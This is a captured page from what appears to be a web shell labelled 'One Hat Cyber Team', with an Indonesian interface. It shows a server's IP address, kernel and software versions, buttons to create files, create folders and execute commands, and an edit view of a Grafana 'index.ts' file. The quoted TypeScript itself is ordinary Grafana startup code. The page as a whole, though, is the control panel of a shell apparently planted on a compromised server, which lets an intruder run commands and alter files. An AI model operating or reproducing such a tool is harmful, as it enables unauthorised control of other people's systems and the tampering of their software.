⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.37
Server IP:
41.128.143.86
Server:
Linux host.raqmix.cloud 6.8.0-1025-azure #30~22.04.1-Ubuntu SMP Wed Mar 12 15:28:20 UTC 2025 x86_64
Server Software:
Apache
PHP Version:
8.3.23
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
share
/
grafana
/
public
/
app
/
Edit File: index.ts
import './core/trustedTypePolicies'; declare let __webpack_public_path__: string; declare let __webpack_nonce__: string; // Check if we are hosting files on cdn and set webpack public path if (window.public_cdn_path) { __webpack_public_path__ = window.public_cdn_path; } // This is a path to the public folder without '/build' window.__grafana_public_path__ = __webpack_public_path__.substring(0, __webpack_public_path__.lastIndexOf('build/')) || __webpack_public_path__; if (window.nonce) { __webpack_nonce__ = window.nonce; } // This is an indication to the window.onLoad failure check that the app bundle has loaded. window.__grafana_app_bundle_loaded = true; import app from './app'; app.init();
Simpan